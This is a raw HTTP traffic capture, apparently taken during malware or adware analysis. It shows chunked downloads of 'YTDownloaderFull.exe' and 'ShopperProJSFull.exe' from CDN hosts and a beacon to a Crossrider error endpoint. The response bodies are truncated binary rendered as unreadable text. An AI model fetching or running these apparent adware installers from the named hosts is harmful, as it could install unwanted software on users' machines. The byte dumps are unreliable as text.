User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:33 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 4000000-4249999/7202623
>.....|.h....I;.b>..!.hm5.h6...K......):.....Orc.NB0.....F..y..#
.9I.|..X.. <.cce........S.B.(..[XB.'FO..].Z..m....".N|L.....A.`..-.
[email protected]%.X6.9.W..y.U..y..y.
...9..D<.......v.|S.....q.kG.q:.....&_.]........b..*......S...j..Z.
.....A......V....v2E...I.;C.?5"sJ.=z.ad.5.u[[email protected]$.9).....*....D.1.
..naqH-z?,...F.t%e.K..i..Aa. fB.e.kE....Q2P....*A$K...W...].m.......P.
b.]5.gi....W.j/..3....,..=...(..?..~.0`w.w..@,o..1.O. ....i..7.....`..
..c ........2...=..8....d....1.....A...<F.U..d.$rh.?...o.1.r...G{.!
[email protected]../|..(r...|...0R.1T\ ...RX...@..=......tr...&
gt;..7.......#...J\....brz..."..B/..N..2..M5Pe..q......._ho..$P.......
.h.u..w3."J/R.ZR.t..?...."..1....]b!C{..]6ID=..Z..^.B.>..........,.
....=.B$...]........&i.........._L.2n2..........(.....eF..^....p....5V
...>...w...|B..3Zt. ...7..9..i.g...)./.[.X./..c..j.......9....{.]..
.....G.c....gq-J........Fg...&.n.dZ...'P.....E.........gv.:..S... ....
5gvi.F.#......Kx.h).yy.J.Esd.[.`.....-~.g..;..G/.%....=.K&?kG.. ._.!.W
[V.^S.....0%.pQ.;.kiv.*...2..s.WV..H....<.]Y:.'*[email protected].
...........,.0.o$.....w[FzJ......#......]l.$.V..%x..........G....|ED.=
E...I$B.yeu.m....R...f...O;. `g..*4B.s.&=z....$.*1.K......(w.0.i....U.
......DR-..q.!..:ECA..,w........../..>e'[email protected]
y.....'h...!.{..W"[email protected].?..E....
g.O.x.n...<..R.....6.....7.Nh ...=.2;..........=44.."..MO..&.<..
.l`..`W.7.R..c.\........L........c"z3.1...6.d..B......$.ye..|..=C.
<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1


Range: bytes=4500000-4749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:33 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 4500000-4749999/7202623
qG...`.....R .D|..,i.2]...)...*.&...#.....]o...O4n.b....G.....-}.}.-;.
...$...4.<i8..e....8....H|...O...'...%............B7.(.......G.R...
r..8..6......"l.Qf....a.....]p..)9.....e...V..O.1.z...r.v.^.^...!X.)..
..(...x.7.<.,.......>H.=.e..R.e.#%oV.p..8_.h.........}.X..{\..F.
@..fm......(.....hC......6ay............Dr..."b!D.....r._....<.%1:.
.N.. ...>.S...f...fz...1...H..g...d...: ..M.~h..y......q.ex........
[email protected]%...{....... ...m...8....7..f. wh.n..j_..%......8)..
Ll.?.......]....7.v.,... ......dS.*.^.....\ia....X......e.gG.=&I..B...
r.....q......o..wd..FVY.r...a.@........[...2&...J|[email protected].._%.6....`..
5........a>N...'..m.9xGr..;.....P...U......4...;D{g.B...8_.(.....xn
.H.....NY...g_.......fX....Gs...A-.!....I. ...e8..F..9.9.(.._......Zt`
."cU....q...a.!K......o._.}."a.#._..W.?.....i.lTfT.a.......=.5.%......
E.P.DK.#.8Yi .f..a..J.^..1.j..y..u... ..^....%.G........R...~..k..Z.P 
k...*|....!B...x'M`.....i%.m.?..C).X...#$p.......%....A.T....s.k..<
E../.............%{5A...fs.h.z..a.......0..g..mt..5..I....s..U.'......
&p?u.a.c$.XqA......?:...^2...XYd...(.*....r5'.....*h.$.s//..(A....2...
....R...C..]?..F..Z.....D.......l,jG..Z.*8..x.W..y'o...~.h)...1 ..v.z.
.U........H...J.3...>...7.........So....V.i........3_.e.:[email protected]...
.......y....DS*....D~.I.......C...ZE.T....N.[...6.......5B..Z\...po..X
...E1......{..tnp.9*....L..E...T.F.o..*[email protected]..{..KU..,.
v.0oA~x^ ;X.3"F...K....l............{.|-..'-vs...)7*.:W.7".?(d.'.9.c[a
4.i..y..b..Ii..i.r..Mq...M.m.......X`=$].mn?e.`......&..*..2~.Um.;
<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1


Range: bytes=5000000-5249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:34 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 5000000-5249999/7202623
z".y..L....J......^......?.....2.;...#.6.Y..`......{....x.x.8..-...6..
[email protected].._B..>j..BE.'..q.......%[email protected].]r.[.\O.I...oFc^...
.".y.....Y.........?t3.7)..@w.*.D(..........:..l..).&.......)..},.E.6.
n...zq.hb.....g%..*..L..'DX....Q.Q....k.&.,)M.>sz/....E...ds4.....X
...}....W.....).c.{.E.../3.A`.......?QBk...7...QGLMt"A2F&..K._|..'..'.
.9{X.?m[X\...x...4.u..).~.9Q..e...e2..pR.......S.."t.fy......9....G,.(
.c..tL....... .._.#.q..CwH<.;.....Q.../.4.......[}..{...$a.vV...1..
.ph%Qr....P....F..h.\.Fb..B.#.H..O<g..d.!..S..\=........(..J.:.Y.e.
....h..;.,K..-...*.kQ.%..e$.%.L.LowV..z......s.Nf..:.....-...^@.cJ.x.8
C:.%."?.J$x.'g*......=......k...D................."e...S..$...#..6I...
..0..(`_.88E.....*.?.P.G...8.i].2.^.L.....O2].-3hy9d."<0.[_..`tft'.
M..S. .K)&.cis.,.v..o..-.Z......8...d]...A.......*.?....C><.7...
 ..Jc..^...A ..r....'F.F.....0$=.@......".H.v.. ._9G.X.}kYnJ.L.....1..
`...lS.lJ...A...r.[M../CM^.8.=72A....&....m._\v0.R!A....}.I~[....#.:.p
...... ... R......^..a ..a.J,[email protected]....]F.V....5..._.
..R..m_..PT.gZ._MX..U.r.......E....n'.2..`.t..?..|..-V..0.P.2..s..*..D
..;H\...^.....C.=.R.....8f....e G.}t..Y.z.qM.../.r`...T...=.x.#.*.Dxv.
..].P.........e. ....S....~..2o...-.........o..2.va.9....K.)...dWE....
..3H..T.".C..(...R(...I...JB6Z]D.DY..a..JC........|?....S.P(.2.{/A..vj
.{."..~.....R.?.......,....nzf.Y..r.3.Y.n.v.......b%...#_.q....L~....%
.^6Yb.. .g.Zj........^....k......t......p....U.*./.vU....._1Y<I...e
...B.i.....7........t.....@`...i.|......)...|Zi>6F.._...F......
<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1


Range: bytes=5500000-5749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:34 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 5500000-5749999/7202623
..~[-.....-W....o^.Z..eK2.......6....Ks..~Y.$M...t.ey.~A...._..'....q.
W......n...p]..S.[k.....:..1.a....9...Tl3.Z..%^b.K....I<.L.!(....s.
.s..S.4.J.......B)z....s..L.......v$ ..,.$W,.l.`..5u...@..?IHa....%z..
.@ ..?.....vevT.7...o...:HN.........|.F.....h]{ y]FFZ|.3...i.9V.....RR
.s....2f..^..Z..k...........Ic....K<I.5.m?.L.!2....D91y;.Z.......7S
e.....VL......... >.\=l.I.(2....?...;..z.(}..{T#.c...<|)9.J^....
|]<....... ..F..........Q.R{.b.iE....`...x..[...q..G}...6.!...E%Q.j
:8..v...[.5Nv...L...e. ....=aP5.r....L.?..Y(=G..~.M...X.?....../._.>
;|V..g.Y.q......1R.Y.D6...1...4...>..... .c.(]>.V.c............u
......>...k.&]...z..r...{...e.lFD......|..{..R..r '.._..4....n.DZ.-
.....%...p.J(.8.q...A..\Ffi$.1.M..=<zp.#..T.>0.?4NH.O.%......f.x
.^[... .N.gh.i}......5.6.M.] .....)..........R...\..)......y../".X...~
..7gn.D...O..D]q..0....7..).....x.O*.4.....~.1..=u=..S...H...2.A.z....
.Z.; _.f..#"J...P..j....;.6|...I...B...............?1b../B...tO^...O..
..L.............B8.k..~..\#.-BGoLr'....i....X(.....kvf?3^.......h.....
..D...8..CN....M.........$R.(.5.v.ud@?3p..!wU.....-..1.~'0...."....R. 
m.E.s.D#..b.....n].`...}.....z9-..w.^U..}.d.S..O....;F..N. ....Hb.....
..R....$m2..cy.u.dh..J..D...A..l^.s){..B.<._.\.sH.i..>..ia..H.G.
d...Y.5p..................r0FV...'.J|....p.}.;...&..)'..C..h..x.}.....
F./..p.J..,...y.............b.1.|.;[email protected].;t.cm...:.(D.]\.g...
"..)....x 1........6w'._.=..d.=.. r!7"..elb.".'%CU..%'.y........g..m.z
.b..^`...C...R..y]...kA.J.3.a.....M.P..\.['...w.r...s...$.3.)...i.
<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1


Range: bytes=6000000-6249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:34 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 6000000-6249999/7202623
.....S.1(.......4......a..k.~~.7.0o.N.."..=:.2.,..-.L...c]....H..P.m..
.Cc.V..7.(FY.........(A.nx.4...CV0XC... ...%...#.....k.{}I-...s....#..
X=......"..2Z.o\. N`.....>...1......NE......X....<I...$.ZE.J6...
...~..r.".>:...qS.7...l.q|hU;[email protected].....`H.....'...7.!Y..d.!.
...C6..7......} .=8..._7BO.{,.Gt.7&.K..zsI.uc....s..p(...#..^]..S..^#n
.=.A6w.....(.Tkj..y"7=.l.b5..?.t...K7....@:..".*.J.Y^......9.8w..8.-!E
..0.j.5...C{#..s./../............wz.sk.....[?.......q-.:ZF.J,'..=...I.
.....5Q7J..C[.[V.w60....rCZ...4..v.Y.Dw.....q..Id...,(...3....K4 .cS{.
.A...R .MZ...........2.M;0..QK.R...,. .&....d...jO.K.D9...L....&<.d
6...(.>..(.?P...#..a#.nP&Y.............$..C.L...<..../.t....p*..
........{.......Y.WIIj1q4........$...6*`.N?..T....l...K....~H..{..{qb.
}......b,ZH....e3.W... I<..F.7...e!..2.QL...|{....A......T6O_0.....
..._t..\.........B..$.......n.d;.$....|..->.L..?..!.0...U.t.....=..
........y.....yk[,.u<R...|.. ...M [email protected]....&....X.7m..
...>.Tk.mfu!.8...C2.U2...nf..f....v?.he.X..(O...6.J.....U.....$.E..
.....Y....x.P..G.f.s....DOo.....V.($Er..._*X.c.d....C2R~.Z..Z.<.9.]
..H....qp.....v.......8.o|..6g...^R'..},9.2..,........i .B.Vzj}..6C...
2[..&.*v..?...M2.,....b8.F...,.8TPa.5\.......>_...7..q...*....j..).
?.xx..! ...7m.... .z.....)....W$..O.....l.....eD..3a.~.>.wp&#'C....
).HS.9............|..IT.V...K.%||.....A.F...b.C.a..h..7C6E.K....V5..\]
_F..ZD.b."....Y..KfcMIZ."..0..N......w...qg.w.l.d.t......%.S|T...@._..
....?1dK,.K.....]z...;n...l.............TlS....rW\t.8...........}.
<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1


Range: bytes=6500000-6749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:34 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 6500000-6749999/7202623
....}..wr.SU...../]K...]vBp.....M.b$..c.bm....Y8....0.cR....a..qbj....
.'Z.q.$..^..U.?..}|..L........H.....1.. .!..e......y.....L.....s..I v.
...P..Q.h..$;...VrW..V..r.i.f..........'...oE..{<D.T..a.l.c.}....A.
........T^.......r.\..THOLn...O9.... .d0...E.j..X..2..)[email protected].}
....Qc.MR......M.:.v......:%....3....r.!...%.J?.l..2J..C.....{..|....m
5....=9...`a..K..5.;.G.........e...b._.%.%RD.//.r..v#......&.QO,.j....
[.3W<..9UNSn......v.R_8.....MS.lZl./F.:m.LP.Y.;...Ux0.Nec.....s...&
gt;.]....;..q..$.n.qR...U.jI../E..."..Ib.<../.......W.l..x..b.]..N$
..U..7Q..VdnUi.K..M..<.#d.|z..mY...\Q...o.q.8......0..'[email protected].
.~.X...!.N...h...vW#[email protected]...).......|..%.FP.B,.jyZ
.>....D.5j..Hqg..KF..u..1;NF....3r...y%...Z.rY.....m....M....(.V7.u
...{.....,n.-I^.'.u.{$...q.X..0.#.c...J*DWG<w..'..L%.& .....v././ .
....\. 6..\IC...).>.0...W.FZ..,[email protected]
N..[.t..8......%..zg.pm;..x([email protected][email protected].
..... ....@^Y=v....'...9.......O.T..q.......Y.%.a.".k)........'.S.....
...9.....>.f....WS..4..=E....Q.....!.......=...sy....",{......;.. I
......H.z..U...N...>.C.....d`?T.p.}.....!...aJ.....D,..t..a..J.....
.......?A.`.e....W..D.t....(...=.!-.....ry.|r]c.f..^#0.....&"t.....Ef.
?..<..IN...H.T..$i..y..G%".y..F. .LS&.i.S..S..R...?.b...I..Ag>..
.....c...g..m...bJ.u...E...A.......&.._........5....wMh.w..8...Z..\.."
.e..r8.."P..]..8.'S... 5......;.,... ........~.|.4...Z...|...K.7_...H.
...\R6@ ....}...y3fd......:.O..2d..q.i.c.b.....BK'oN.^..Bc..Z.aP..
<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1


Range: bytes=7000000-7202622
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:34 GMT
Content-Type: application/octet-stream
Content-Length: 202623
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 7000000-7202622/7202623
3......9..v.....0........1y.,*....<*2..........A..o..M....%..N.kG..
..ZE...b.D....1~.1.e..,........ ..U.4...e.{Qh-8o...Uh.-....[..6.;,....
16(.."'.D...]...l.b.(.H....$...>..?;..z..D.r.CO2/.../~.{.0....bF...
;H..rf_.>...f..]k!e /.....r&y..U.Mf.1r.<..7..&...].......u...3..
w..mL.b.7N....W...!..#`6lj_bQ(...eZ...~\-Z.. c....^f.0g....=.OSZp... .
.6.,Gq..Xxc.4..V.H....;.....i.R6S.3/t-.*.X^....6..>z.V.-..u.Wy-.qF.
....!'.^....)....w.?.rJ..Z.?.^.Xm....o.H......A)...H.J.JW.... ~.J..].(
M..Vvd./... ...(.G...2.......ii..!D".cm..V.........]s ...}L..07..4...;
...:..7?.4.~....m..O~F.,..aOp..J....T....'..Ji.D.#..O?.k..Pk(R9S8d....
!['..Mi..P...)).T.J.b..s'{;W...Q..w.}..E..U....[...L..;.w.....`....t..
s.R.*.`...C..)X......}L..~.hj7...QtLP;.LVM........c.U....q..5D....Rap.
.8.E..7F.B.......ed...Yeos.9.y!.uW.*...s.Ap.d..!......qx.!.v).. ...0M.
.B...x...!K:2..R....'`.....%9oyn....::...`......t. ..(...Z3..jR9....BW
#..g...W...d6 lT...[l0i.......e$>j<yFI_..... Z..G@...*.eW...,v1.
.`<.y....G.g.\..s....zs..l.=..>.y=v...j.C.8......l..lX.B[V....f.
{..L...6...v...r...-.g%....zo.1^]....P...r..O.............I.:V......9.
Y#...K.....^B8.`1.....#....#...1....u........i...GG0..z...1C..K.-...Y.
".F...{.u$v....J!.K...M2....uM....U..B..L.5[.dU..).!...u..(.0l...2....
$q.o..}....'.....(.2...."...B.gm..Fs?...]..|C...=..tg..u.{....3pB]"..z
.3.q.s%.?..C..c14.. c:....{J.5..@|[email protected] .d.8..R..]4....P....
.....R.......j..H.....~...Y.K.4..... h[...?^..)ec.c.....YV.N........d.
..U.......o....s.........\..t.~7..4....QMw.....\[email protected])%.C>..
<<< skipped >>>


GET /utility.gif?error=start&report=mini_s&ver=1729&action=na&ms_vr=3&clock=15&rnd=18514 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 13 Aug 2015 11:19:21 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..



GET /ShopperProJSFull.exe HTTP/1.1
Range: bytes=0-249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Thu, 13 Aug 2015 10:34:07 GMT
Last-Modified: Thu, 13 Aug 2015 09:23:24 GMT
ETag: "8eaa7e23e6aa005980487eb864dcaa53"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2659
Content-Range: bytes 0-249999/2707720
X-Cache: Hit from cloudfront
Via: 1.1 a95b55563304fbc5544e7dfbb15b0001.cloudfront.net (CloudFront)
X-Amz-Cf-Id: BdcwCMFlx5QA9JTR--N2UUTZpBkKkTqrwPn686wRbwFnAfwjlAkZkQ==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....
oS.................\...........2.......p....@.........................
..........)......................................s....................
..X7)..............................................................p..
.............................text....[.......\.................. ..`.r
data.......p.......`..............@[email protected]..........
[email protected][email protected]
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u....r@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Tp@[email protected]
....E..9}[email protected].}.j.W.E......E.......@[email protected]..
[email protected]<[email protected] [email protected]...\r@._
^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.
<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1


Range: bytes=500000-749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Thu, 13 Aug 2015 10:34:07 GMT
Last-Modified: Thu, 13 Aug 2015 09:23:24 GMT
ETag: "8eaa7e23e6aa005980487eb864dcaa53"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2660
Content-Range: bytes 500000-749999/2707720
X-Cache: Hit from cloudfront
Via: 1.1 a95b55563304fbc5544e7dfbb15b0001.cloudfront.net (CloudFront)
X-Amz-Cf-Id: XbTBKrHFJzqt0ok0gsNd8DHnkAX9Lv-UUMpN4rMyYDJ5B8RGkg-Nkg==
......3,.S.S.=..7..1s.O>G.\..X.7>V...g..[......L....!..0l$.l{pk.
6qq.@../z.)3\..../[email protected]
-?..x6*..nG...mv..d...8.`.s.^).{.Cc$...d....6.^1...v.....nb..4%.)li~x.
....8^[email protected].=....).}..~.y..........SZ.6.N`.......{.*.YY"...v
..@..>"L......f..f.U...6PE..e.......p!1z-.iH........4..df......g.v.
@p.....p.\,Q...{6B.YQh..4e.` ..&...*..m=...C...h.3<..fc...P"..<.
.*.f..`G.....$...n$|x.QK....LW&!...W]......Ls..w...U>.x.... ... p..
:G..........J|.-..cz.NR*...;...{.&........?.w'......0..m.K..X........b
vR....Y.G...w..&.Z..&VR<=.y......RA4.._i..L....t.e......../.P.O....
._.s.M.......UP"X.%[email protected].......
\.y..o4m.R.....1UJ.3...9....7.....|....ugB_j4K..7....^.U.}... .B...#P3
Y........L[..Cd..W...m......~.Za.i..y>kc...U:......9#../...._....'n
\.u.'..h.Q=/n......S...Vz..38<.>F...D.........2._h...J"lj.O.....
@..,.O.../p.D...^..|.rx6...3...R%...I`.[.:..T(.{.Ba%..q.....k......G.t
...N...6.~.....`....'b.z8*..S.^........xX..@j..#.c.G..T.o.._....W..`[m
.].g[4{1^.....HX.i_.w.k..#....M_i.:....;..........2.^D........)..N....
n....!.....6..JE....3.....{..Y...8.nDJj0..}..@@.@c.]..H.7........F.%*.
d...i9.....x9.C..e.../e.....{[email protected]_9....^r.. ....m.0t3...].a_(.....
..T...Ug...D..r..;....go&...[../yN.8l.. ).. ...G.[}.&r....z..vX*9.V'~g
..j...... .&|{$\......}.W}\.]b8. .0..J)6'F....Ij .\8..@.:.......Q.C.E.
.|..."{J..h.HV......._-...6vG....{=.IU*R.{8..)..........0..H....;..m..
..2.j;....;...M..'".%...].....-..Ty..*..^.4.Pu.Q......f..e.VNL.1..
<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1


Range: bytes=1000000-1249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Thu, 13 Aug 2015 11:18:28 GMT
Last-Modified: Thu, 13 Aug 2015 09:23:24 GMT
ETag: "8eaa7e23e6aa005980487eb864dcaa53"
Accept-Ranges: bytes
Server: AmazonS3
Content-Range: bytes 1000000-1249999/2707720
X-Cache: Miss from cloudfront
Via: 1.1 a95b55563304fbc5544e7dfbb15b0001.cloudfront.net (CloudFront)
X-Amz-Cf-Id: N1rla0s24OSj29nRmoKskxkRCFGx9urbQCV4GMyD7h9yhfWj4qmayQ==
...c{...Xd...].y...<c<{I7..4t.{_......M..Y.>@...x..3'!..{!...
.W..&....4.......IO..[...f'L.. ..lwm....V..:!...,..........mn...#...|.
a_..).........:.[...6WCp.......C.'.H..8.............k..Sex.9..t-V..e9h
..pd=P....w.X..Z.VL.m<.d..#..|N.x..c..!.j..9 P.4...e.}..N.!...xlk..
59..3.j ZC..V...Kt.......[1..,.L.r.e.E.^.w..m.zZ.A....}d9P...{..;#....
. ...G.Q.A-........,....O..!...sq.........$M....Tn... ...3........ C..
[email protected]\.......l.H../1...b.W.[.<|7..MxHR.
..zmF.xV{.>YD..=.T{.QF....:...mXg.]|gK...P....cjR..o....`.,....$...
.G..W....<..S..n..Q.v;.j]aZ...n.E........Z5p..7?.n..K....$......yG.
s...&.....J......T..8o,[email protected]....=
.q9T..[<..'.q=...Th....#m...|$Bg&=b..e..n(.`...h6../.Z..j...E.Z....
.W..%..!..'`.-....v.....{..T...o^...J-.[.......I.b.5...L[(..........xe
...4d..~g.. _......!}e,....>..?\.....9B..PaHT.....$.......M.K......
...A3E...-.....g.t.....Nt*.3*.6.b0...:W./...b...-X.OT...j...jx........
_......u8....D..x......N.r...$....YG.....=.G=......_.?w.P.tcfj...L.@..
...R.."}...;nB..pg..5.E...g.m..T...PD..".-p....I<'6..N..]sX1.......
1..|.Ep}...Szc...yv...E.o...j.......&..&\E";.q5..1He./.[...#..t*$5..b.
0Y.ZP..(...^2.-.....~......q._........y.0....8....:.T.BO#O...}..u..]..
hh..!.. 9....EC^P../sX.4....'.]y.....E.q..X..!.F.XU....{K........ ....
...E!..,-.r>;f...|3.$e.......Wa..>e..{..k...........k....c.....;
....&7Z2p..._...H.&....1..I9Xa...gy...2..g......E=.A.Y.\j.T....S..ID.&
.........o.^..#....7..(h...F (2.B;...E.O..p.Sz*.7....A.h"pO7.. *..
<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1


Range: bytes=1750000-1999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Thu, 13 Aug 2015 11:18:28 GMT
Last-Modified: Thu, 13 Aug 2015 09:23:24 GMT
ETag: "8eaa7e23e6aa005980487eb864dcaa53"
Accept-Ranges: bytes
Server: AmazonS3
Age: 1
Content-Range: bytes 1750000-1999999/2707720
X-Cache: Hit from cloudfront
Via: 1.1 a95b55563304fbc5544e7dfbb15b0001.cloudfront.net (CloudFront)
X-Amz-Cf-Id: tVuwUmXRxaRx0tv3_k-KHoMv7M8uzxEVEpUEjNsAuwoB5JT7to6hDA==
..(.u..Ok.l.......\z[..P{n................Rrs....v..S0.g.z.....:...%..
.....t%..DrR.lY.W....!vj.yI3..3....S5.....fpj.D.iiqJ#JF&:.*Q...(=..q."
......|..X...hP.N.r.l..P.G.m..s..y3...........k9.i3M./&.....c......j.a
zJ...oS."(.s.......J..V*.{...a...d.~.(...%.<..W..c`q.`.. .L....p...
y..{|.<..x._..$Lt...,U.....:...$...$....s..scf..$..&K...._pI...9...
._.?e%..<bp]...|.m....I...ZQ..........E.q....H4..(.....^c.[...kQ...
..D$.n.Fk..(0*B....m.....A.n5\..KB.....#.p........#.4..U..(...../.E!..
...B#p.R..2....7".G\.8W...........&...;&.7.|V..5".....7..(...%.U.....&
lt; .hp._...EC.74.. ..I..a.*....Y....I...3%.aOd..*K....O]...S...).b'..
 .;..........3.h..KW.....[..,{.K......./.e.......%$!.......FJ..Xu.."..
.l)k|j..~..N......z.|.p....O....$^....H.......}f.6]".1."~4S4.*.|&J..O4
._...Ef..N.h....c...5t.....q...>.$......S.^.....?mO.3#e..e....yC...
ec...-...;.<.....a.-y...... .~D.....8v.~...B......o....l.0C...oF...
.EA,..G.b3\.W.....f..... ..............9..._.vd....f.^..ml.g7.O._.>
.7'....hj. W.We,}.9;.c..K1[U.E}.k:...l..=u.....7.....GA..0..b.rd..c...
.5......5Dt..!.w.....>...@x..&7<.W....,. .....M.D.;7.E......#..%
.ZN...B.........p..AU...z.H..K..U.............F9.x....ne.Y....x......[
..Y......'..B..HC..[.p{..............)oH...lt.....U.o.c...^.N..za.T../
.-..Y..*.`.......%.6D.O.}...3...J>i..m.U?..:.|.F0...M....# .wR..W..
...N.q......<..p....\=)...El..-.M.....h..<$7Z... ..... ...k./{.V
...l..p.....9..E.w.M.c.A.E.oc..8. c.=4.]..m*>h.$.l...6\.e.\. ...c.s
.Bo..!.JB.~...^..C......g..|8......L8..."../...3.....I......YmY1,o
<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1


Range: bytes=2500000-2707719
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 207720
Connection: keep-alive
Date: Thu, 13 Aug 2015 11:18:30 GMT
Last-Modified: Thu, 13 Aug 2015 09:23:24 GMT
ETag: "8eaa7e23e6aa005980487eb864dcaa53"
Accept-Ranges: bytes
Server: AmazonS3
